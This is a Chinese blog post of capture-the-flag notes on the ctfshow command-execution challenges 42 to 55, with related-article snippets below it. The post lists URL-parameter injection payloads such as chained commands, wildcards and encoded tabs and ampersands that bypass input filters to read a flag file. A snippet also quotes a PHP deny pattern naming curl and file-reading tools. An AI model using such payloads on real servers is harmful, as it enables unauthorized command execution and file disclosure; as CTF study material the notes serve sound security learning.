命令执行day3

最新推荐文章于 2023-05-12 22:09:45 发布
最新推荐文章于 2023-05-12 22:09:45 发布
阅读量448 收藏
点赞数
分类专栏: 命令执行 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zbbjya/article/details/123688068
版权

ctfshow 42

在这里插入图片描述
这句话的意思是所以的c的结果值是不会返回的在这里插入图片描述
试一下双写绕过
在这里插入图片描述第二个再黑洞,第一个就正常输出
双写绕过

?c=ls;ls

tac 是一个逆向可以将html中的注释破坏
在这里插入图片描述?c=tac flag.php;ls

ctfshow web 43

在这里插入图片描述
在这里插入图片描述相当于进行一个命令分割,先执行前面的命令,后面的命令不用管
然后跟ctfshow42一样得到flag就可以了

ctfshow 44

将flag过滤

`?c=tac fla?.php;ls`

在这里插入图片描述在这里插入图片描述

ctfshow 45

多过滤了一个空格
将空格用其他代替过滤就好用%09

?c=tac%09fla?.php;ls

在这里插入图片描述

ctfshow46

过滤了*号可占任意个 ?只占一个
在这里插入图片描述在这里插入图片描述
在这里插入图片描述?c=tac%09fla?.php%26%26ls

ctfshow 47

用ctfshow 46 打就可以了

?c=tac%09fla?.php%26%26ls

在这里插入图片描述

ctfshow 48

同样可以用这样的方法

?c=tac%09fla?.php%26%26ls

在这里插入图片描述

在这里插入图片描述

ctfshow49

相较于上面几题多过滤了一个百分号
在这里插入图片描述这是大家就有疑问为啥呀
代码里面也有百分号呀
%09是由url解码另外的字符
&&-> %26%26 也是一样的

ctfshow 50,51

类似就不分开了大部分一样看看五一的图
在这里插入图片描述fla"g 不能使用(?)不支持通配,使用两个单引号,就可以把后面的隔掉
||使用url 编码将%7%7 来代替
nl在这题中可以一定程度上有着cat的作用

nl
nl命令读取 file 参数(缺省情况下标准输入),计算输入中的行号,将计算过的行号写入标准输出。在输出中,nl命令根据您在命令行中指定的标志来计算左边的行。输入文本必须写在逻辑页中。每个逻辑页有头、主体和页脚节(可以有空节)。除非使用-p选项,nl 命令在每个逻辑页开始的地方重新设置行号。可以单独为头、主体和页脚节设置行计算标志(例如,头和页脚行可以被计算然而文本行不能)。其默认的结果与cat -n有点不太一样, nl 可以将行号做比较多的显示设计,包括位数与是否自动补齐0等等的功能。
详解看https://blog.csdn.net/guobingjie123/article/details/78774565?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164803092816780271961645%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=164803092816780271961645&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-78774565.142v3pc_search_result_control_group,143v4control&utm_term=+nl%E5%91%BD%E4%BB%A4&spm=1018.2226.3001.4187
这个是ctfshow51的图

在这里插入图片描述

ctfshow52

在这里插入图片描述
可以查看根目录
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

ctfshow53

在这里插入图片描述在这里插入图片描述

ctfshow54

在这里插入图片描述

在这里插入图片描述在这里插入图片描述再列一下根目录看写入了没有,如果写入然后再执行z.txt
就可以得到flag

ctfshow 55

经典的无字母rce
这个有点复制太晚了我觉得可能理解起来有困难,明天再战

zbbjya
关注
专栏目录
hive-shell批量命令执行脚本的实现方法
09-15
`cd` 切换到 `HIVE_HOME` 目录下,并执行 `bin/hive -e "$sql"` 来运行存储在变量 `sql` 中的Hive命令。 接着,使用Hadoop的HDFS命令创建表的分区目录,并上传数据文件到对应的分区。在本例中,我们创建了一个名为 ...
急求,FLAG
weixin_72768321的博客
03-29 174
if(!!!} hacker!!!
命令执行各种姿势总结
weixin_48427966的博客
04-24 1468
一、绕过if(!eval($c);web30。
命令执行web入门
2201_75316477的博客
12-30 1551
我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。如果对取反不了解可以百度一下,这里给个容易记得式子,如果对a按位取反,则得到的结果为-(a+1),也就是对0取反得到-1。其中%09,%26不受数字被过滤的影响,因为在加载时%09,%26会被解码为空格和分号,也就没有了数字。过滤了冒号,不能用伪协议了,没有过滤英文状态的**()** 和**;这下好了,过滤了字母,但是数字没有过滤,数字?
Linux 常用命令之cat、tac、nl
weixin_34392843的博客
01-22 125
cat、tac、nl : 显示文件内容cat:(Concatenate)由起始开始显示文件内容使用格式:cat [OPTION] [FILE]...参数:-A:显示全部,相当于 -vET 的整合选项-b:显示行号,针对有内容的行,空白行除外...
【xctf之unseping】
qq_40646572的博客
10-12 5228
这是一道,让我头皮发麻的题,前期感觉一般,后面感觉好像搞不定了。。。看了writeup才知道php还能这样用。。题目如上,一眼就可以看出这就是考察php的反序列化,感觉这不so easey?好像还真不是(菜鸡挠头)。首先就是正常的反序列化,在反序列化的时候首先触发__wakeup()函数,迭代args参数中的值进行过滤,解题的关键就是绕过这个过滤。可以看到,
致远OA-A8系统的0day远程命令执行的实战-附件资源
03-05
致远OA-A8系统的0day远程命令执行的实战-附件资源
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator API 的SpEL(Spring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...
RHCSA-DAY3
09-23
### RHCSA-DAY3:Red Hat Certified System Administrator (RHCSA) of RHEL 7 Lesson Three 在本章节中,我们将深入探讨Red Hat Enterprise Linux 7(RHEL 7)系统管理的相关知识点,这是针对希望获得Red Hat认证...
C语言复习笔记-day3
08-07
【C语言复习笔记-day3】 在C语言的学习中,我们继续深入探讨了各种核心概念。以下是一些重要的知识点总结: 1. **printf 函数**:`printf`是用于输出格式化字符串的函数,若要使其在窗口停留更长时间,可以使用...
攻防世界 unseping
qq_70851535的博客
05-12 314
第六、想要执行cat flag_1s_here/flag_831b69012c67b35f.php来查看flag,cat,flagphp都可以用双引号绕过,空格用${IFS}绕过,/要用printf及$()绕过。令$arg=c""at${IFS}f""lag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp。第四、发现一个名为flag_1s_here的文件夹,于是再ls flag_1s_here,但是由于flag被过滤,所以又要用引号绕过。
ctf php 字符串 过滤,ctfshow命令执行(50)与常见过滤的思考
weixin_39667041的博客
03-25 2601
源码:if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1")...
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
贤鱼的博客
09-13 2337
复习前文知识并作总结,值得收藏以备不时之需
细说——命令执行_代码执行
LainWith的博客
10-11 3491
目录原理命令执行漏洞原理代码执行漏洞原理命令执行与代码执行漏洞区别命令执行&代码执行漏洞危害命令执行无回显代码执行函数1- eval()2- assert()-最好不要加上分号作为结尾3- call_user_func()4- create_function()5- array_map()6- call_user_func_array()7- array_filter()8- uasort()函数9- preg_replace()命令执行函数1- system()2-passthru()3- exe
CTFhub RCE 命令注入部分
qq_41497476的博客
07-01 1263
这种题其实已经比较熟悉了,使用 |,&&,;等分隔符对前面ping的内容进行隔断,然后执行自己的命令 任意值;ls 发现了除了目录下除了index.php外还有另一个php文件 输入 127.0.0.0;cat 21701615624125.php 发现确实多了个反馈的参数,但是看不到值,很疑惑后面知道了,这是因为cat命令反馈的值无法直接显示 这时有两个方法,一是直接查看源码 源码里是能看到的 第二个方法是直接把命令改为 127.0.0.1;cat 27712282015742.php.
绕过之cat|/ flag
m0_61011147的博客
09-06 2132
绕过之cat|/ flag
web安全-命令执行漏洞
weixin_61956136的博客
07-25 1969
web安全-命令执行漏洞
php 正则匹配反斜杠的问题
qq_45570082的博客
06-09 981
php 正则匹配反斜杠的问题 在做安洵杯 2019的easy web时碰到了php的反斜杠问题,想来研究一下,可以在buuctf上复现一下 稍微修改一下源代码,方便研究 $cmd = $_GET['cmd']; echo $cmd; echo "<br>"; if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|
命令执行
m0_55854679的博客
08-10 3888
漏洞原理 部分Web应用程序提供了一些命令执行的操作,例如,想要测试http://www.example.com是否可以正常连接,那么Web应用程序底层就很可能去调用系统操作命令,如果此处没有过滤好用户输入的数据,就很有可能形成系统命令执行漏洞。程序中因为某些功能需要执行系统命令,并通过网页传递参数到后台执行。然而最根本的原因是没有对输入框中的内容进行过滤,导致出现该漏洞,正常情况下输入框只能接收指定类型的数据。 漏洞概述 攻击者通过web应用可以执行系统命令,从而获得敏感信息,进而控制服务器攻击内网。 漏
Python定时执行linux命令
最新发布
05-11
你可以使用Python的第三方库`schedule`来定时执行Linux命令。首先需要安装`schedule`库,可以使用以下命令进行安装: ``` pip install schedule ``` 然后可以使用以下代码实现定时执行Linux命令: ```python import schedule import time import os def job(): os.system("your linux command here") schedule.every().day.at("00:00").do(job) # 每天00:00执行 while True: schedule.run_pending() time.sleep(1) ``` 其中`job`函数中可以写入你需要执行的Linux命令,然后使用`schedule.every().day.at("00:00").do(job)`指定执行时间。这里指定的是每天的00:00执行,你可以根据需要进行调整。最后的`while True`循环则是为了不断地检查是否到了指定时间执行任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值